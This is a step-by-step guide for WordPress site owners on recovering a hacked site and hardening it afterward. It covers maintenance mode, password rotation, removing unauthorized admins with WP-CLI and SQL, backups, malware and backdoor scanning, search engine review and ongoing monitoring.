WordPress Site Hacked? Here’s How to Recover and Protect It

A hacked WordPress site can feel like a nightmare. Suddenly, your visitors see strange pop-ups, search engines flag your site as unsafe, or you lose access entirely. It’s stressful, it’s disruptive, and for many site owners, it’s deeply personal — your site represents your hard work, your business, and your reputation.

But the good news? You can recover. And you can protect your site from future attacks with the right measures. In this guide, we’ll walk you through a WordPress hacked site fix, showing you exactly how to remove WordPress malware, secure your files, and prevent future attacks.

1. Stay Calm and Confirm the Hack

Before jumping into recovery, you need to be sure the issue is actually a hack. Sometimes a broken plugin, misconfigured theme, or expired SSL certificate can cause similar symptoms.

Signs of a hacked WordPress site include:

• Your homepage is defaced or replaced with unfamiliar content.
• Strange redirects send visitors to spam or phishing sites.
• Unrecognized admin users appear in your dashboard.
• Files on your server are modified without your knowledge.
• Google flags your site with a “This site may be hacked” warning.

If you’re unsure, scan your site using a security tool like Sucuri SiteCheck or Wordfence Security Scanner. These tools can detect malware, injected scripts, and suspicious changes.

2. Put Your Site into Maintenance Mode

If your WordPress site has been hacked, you don’t want visitors stumbling onto malicious content. To protect your visitors and prevent further damage, temporarily take your site offline. Many security plugins offer a “maintenance mode” so hackers can’t continue exploiting vulnerabilities while you work on your hacked WordPress recovery.

Here are some quick ways to enable maintenance mode:

Use a Plugin

If you still have access to the dashboard, install a plugin like:

• • WP Maintenance Mode & Coming Soon – Simple and customizable message with no coding.
  • SeedProd – Offers design customization and branding options.
  • Under Construction – Quick setup with ready-made templates.

Once activated, you can set a headline, message, and optionally a contact form so users can still reach you.

Use Hosting Provider Tools

Many hosts like SiteGround, Bluehost, and WP Engine have a built-in maintenance or “staging” mode. This is even better because it can block all public access without disabling the backend.

Manually Enable Maintenance Mode (if dashboard is inaccessible)

If you can’t log in, create a file called .maintenance in your WordPress root directory and paste:

$upgrading = time();

Save the file, and WordPress will automatically show a maintenance message to visitors until you delete it.

3. Change All Your Passwords

Your first security move should be to lock out the attacker. Change passwords for:

• WordPress admin accounts
• Hosting control panel (cPanel, Plesk, etc.)
• FTP/SFTP accounts
• Database (MySQL) login
• Any connected email accounts

Use strong, unique passwords and enable two-factor authentication (2FA) wherever possible. This step is critical because if the hacker still has valid login credentials, they can undo any cleanup work you do later.

4. Check for Unauthorized Admin Users

After a breach, check whether any new administrator accounts were created. Attackers commonly add admin users so they can return even after you remove visible malware. If you can access the dashboard, go to Users → All Users and filter by “Administrator.” Look at registration dates, display names, and email addresses for anything unfamiliar.

Temporarily disable new registrations in Settings → General (uncheck “Anyone can register”) and force a password reset for all remaining admins.

If you prefer command-line or database checks, you can list administrators with WP-CLI or run a simple SQL query in phpMyAdmin (replace wp_ with your table prefix if different). Always back up the database before running queries or deleting accounts, and export or screenshot the list first so you have evidence to analyze later.

WP-CLI example (SSH access required):

# list administrator accounts
wp user list --role=administrator --fields=ID,user_login,user_email,user_registered --format=table

# delete a suspicious user and reassign their posts to user ID 1 (example)
wp user delete 123 --reassign=1

phpMyAdmin / SQL example:

SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users u
JOIN wp_usermeta m ON u.ID = m.user_id
WHERE m.meta_key LIKE '%capabilities' AND m.meta_value LIKE '%administrator%';

After removing any unauthorized accounts, force all users to reauthenticate by rotating your authentication salts in wp-config.php (you can get new keys from the WordPress secret-key generator), and enable two-factor authentication for remaining admin users. Finally, keep an eye on audit logs (security plugins like Wordfence, Simple History, or similar) to watch for suspicious account activity and to help identify how the account was created.

5. Back Up Your Site — Yes, Even If It’s Hacked

It might sound counterintuitive, but before making changes, back up your hacked site. This gives you a copy of the compromised files and database that you can analyze later to understand the attack vector. It also ensures you have something to fall back on if cleanup goes wrong.

Save both your site files and database to your local computer or secure cloud storage. Do not overwrite your existing safe backups (if you have them) — keep this infected copy separate.

6. Identify the Entry Point and Damage

Hacks usually happen through vulnerabilities in plugins, themes, weak passwords, outdated WordPress versions, or insecure hosting. To identify the cause:

• Check your server’s access logs for suspicious login attempts.
• Compare your current WordPress core files to a fresh download from WordPress.org — differences may reveal malicious injections.
• Review recently modified files in /wp-content/themes/ and /wp-content/plugins/.
• Look for unknown PHP files, especially in /uploads/, /tmp/, or the site root.

This is also the time to see if your database has been tampered with. Malicious actors often add spammy links or create hidden admin accounts through SQL injections.

7. Clean Your WordPress Files and Database

If you have a clean backup from before the hack, restoring it is often the fastest solution — but make sure the backup predates the compromise.

If you must clean manually:

• Replace all core WordPress files with fresh copies from WordPress.org.
• Remove unused or suspicious plugins and themes.
• Scan for malicious code like base64_decode, eval(), or long strings of obfuscated characters.
• Clean the database by searching for suspicious entries in wp_posts, wp_users, and wp_options.

If this process feels overwhelming, consider hiring a professional cleanup service like Sucuri or MalCare — they can often restore a site within hours.

8. Check and Remove Backdoors

Backdoors are hidden scripts that hackers leave behind so they can re-enter your site even after you clean it. Manually finding them means combing through PHP files — not fun, and easy to miss something.

Instead, use automated tools to scan for them:

Wordfence Security (Plugin)
Install and run a full scan. Wordfence compares your core, plugin, and theme files to originals in the WordPress repository. It flags altered files, suspicious code patterns (like eval() or base64_decode), and unknown PHP scripts in unexpected locations. You can then delete or repair infected files directly from the plugin.

MalCare Security (Plugin + Cloud Scan)
Uses off-site servers to scan your site without slowing it down. Detects hidden malware and backdoors that may evade basic scanners. Can automatically remove malware with one click in the premium version.

Sucuri SiteCheck (Web Tool)
Visit https://sitecheck.sucuri.net and run a scan. It checks for malicious code, blacklisting, and security anomalies. While it’s mainly an external scanner, it’s good for spotting issues before digging deeper.

Server-Level Malware Scanners (Host Provided)
Some hosts offer ClamAV, ImunifyAV, or custom malware scanners in cPanel or their dashboard. These can find unusual PHP files in directories like /wp-content/uploads/ where hackers often hide scripts.

WP-CLI Malware Scan (For Advanced Users)
If you have SSH access, some plugins (like Wordfence) can run via WP-CLI commands, letting you scan large sites faster without browser timeouts.

After removing a backdoor, always check the .htaccess file in your root directory — hackers often use it to hide or redirect traffic without adding obvious malware. The goal is a complete WordPress malware cleanup, removing every trace of infection.

9. Request Search Engine Review

If Google or Bing flagged your site as hacked or containing malware, you need to request a review after cleaning.
For Google:

• Log into Google Search Console.
• Check the Security Issues tab.
• Click “Request a Review” after confirming your site is clean.

Approval can take anywhere from a few hours to a few days.

10. Strengthen Your WordPress Security

Once your site is back online, focus on prevention. Key measures include:

• Keeping WordPress core, plugins, and themes updated.
• Using only trusted plugins/themes from reputable developers.
• Installing a security plugin like Wordfence or iThemes Security to monitor activity.
• Enforcing strong passwords and 2FA for all users.
• Limiting admin access and disabling unused accounts.
• Moving the login page from /wp-admin to a custom URL.

11. Monitor Your Site Continuously

Security is not a one-time fix. Enable ongoing monitoring to detect suspicious activity early:

• Set up email alerts from your security plugin for file changes and failed login attempts.
• Schedule automatic daily or weekly backups.
• Regularly scan your site for malware.

By building these habits, you dramatically reduce the chances of falling victim again.

12. Hire a WordPress Support Agency

One of the most effective ways to safeguard your website is to hire a WordPress support agency. These agencies provide ongoing maintenance, security monitoring, malware removal, and regular updates for your site. They’re equipped with the expertise needed to address vulnerabilities quickly, prevent attacks, and ensure your site remains secure. Investing in professional support ensures you have a dedicated team watching over your website 24/7, giving you peace of mind and allowing you to focus on other aspects of your business.

Final Thoughts

A hack doesn’t have to mean the end of your site. By following this WordPress hacked site fix process, you can remove WordPress malware, recover your files, and rebuild your site’s security. Act quickly, stay vigilant, and invest in ongoing protection to avoid future incidents.

Think of this incident as a wake-up call — WordPress is powerful, but its security depends on vigilance, timely updates, and safe practices. Protecting your site is an ongoing process, but with the right steps, you can keep your hard work safe from attackers.